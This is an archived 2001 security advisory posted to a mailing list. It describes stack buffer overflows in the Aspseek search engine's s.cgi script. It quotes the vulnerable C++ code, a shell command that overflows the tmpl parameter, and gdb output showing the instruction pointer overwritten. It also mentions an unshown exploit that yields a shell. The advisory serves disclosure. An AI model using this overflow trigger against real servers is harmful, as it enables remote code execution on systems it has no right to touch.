OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Neil K (neilkALLDAS.DE)
Date: Sun Mar 18 2001 - 19:46:56 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    |---------------------------------------------------------------------------------------|
    / Product: Aspseek Search Engine. /
    \ Vendor URL: www.aspseek.org \
    / Tested on: v1.0.0 -> v1.0.3 [Freeware] Linux /
    \ Vendor Contact: Mailed on 8th March NO Reply Vendor Patched though \
    / /
    |-- The Problem, ----------------------------------------------------------------------|
                    The Aspseek Search Engine is like many other C/C++ Compiled search
    engines, and uses a MySQL database as its data store.

         "Our stable releases are really stable" - aspseek development team

    -Overview,
                    Once compiled and properly setup, you are left to copy s.cgi to the cgi-bin
    of your webserver. This script acts as the input and output for the search engine,
    taking user defined data and outputs the search results. Unfortunately there is a
    problem in the parsing of user defined data.

    -/Overview

    -Detail,
                    There are multiple buffer overflow conditions in s.cgi, the first being the
    most obvious:

    1.
             sc.cpp:
                 int search(char *exe, char *arg) {
                 ==>
                    if ((env = getenv("QUERY_STRING")))
                   {
                       strcpy(query_string, env);
                       ....
                   }
                 <==
                 }

                 Where query_string is defined as: query_string[STRSIZ] = query_string[4 x 1024]

                 Through experimentation i found that it would take at least 10272 chars to
                 overflow this buffer, therefore making it useless remotely. Since Apache by
                 default will only take a URI of 8190 bytes length.

    2.
             templates.cpp:
                 int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
                 ==>
                      else if ((!STRNCMP(token, "tmpl="))
                      {
                           char* tmpl = token + 5;
                           char tmplu[2000];
                           sprintf(tmplu, "&tmpl=%s", tmpl);
                           ....
                      }
                <==
                }

                 The above condition is a classic buffer overflow, i found that the buffer can
                 be overflowed with 5148 bytes of data. Therefore making this remotely
                 exploitable.

                 Example,

                 [rootlinux cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
                 [rootlinux cgi-bin]# ./s.cgi

                 Content-type: text/html

                 <html><body>Can't open template file 'aaaaa...............'!</body></html>
                 Segmentation Fault (core dumped)

                 [rootlinux cgi-bin]# gdb s.cgi core

                 GNU gdb 5.0
                 Copyright 2000 Free Software Foundation, Inc.
                 GDB is free software, covered by the GNU General Public License, and you are
                 welcome to change it and/or distribute copies of it under certain conditions.
                 Type "show copying" to see the conditions.
                 There is absolutely no warranty for GDB. Type "show warranty" for details.
                 This GDB was configured as "i386-asplinux-linux"...
                 Core was generated by `./s.cgi'.
                 Program terminated with signal 11, Segmentation fault.

                 #0 0x61616161 in ?? ()

    -/Detail

    |-- Exploit, ----------------------------------------------------------------------------|
                    To demonstrate the problem i have supplied a Local exploit which
    simply drops s.cgi to a shell. This condition is exploitable remotely and could be
    used to obtain a remote uid=nobody shell.

    |-- Solution, ---------------------------------------------------------------------------|
                 Vendor provides a patch aspseek.org, strange though i got no reply??

    |-- Credits, ---------------------------------------------------------------------------|

            Asp Group - producers of Asplinux & Aspseek, for making Asplinux the
                                 wierdest distro i have ever used.
            mjm - muenchgmc-online.de, the fastest mail replier ever :)
            all alldas.de
    _________________________________________________________________

    NeilK (neilalldas.de/neilkalldas.de)
    www.alldas.de

                 "Regulation of Investigatory Powers Act (RIP)
                         Communism in the UK since Oct 2000"
                                                http://www.stand.org.uk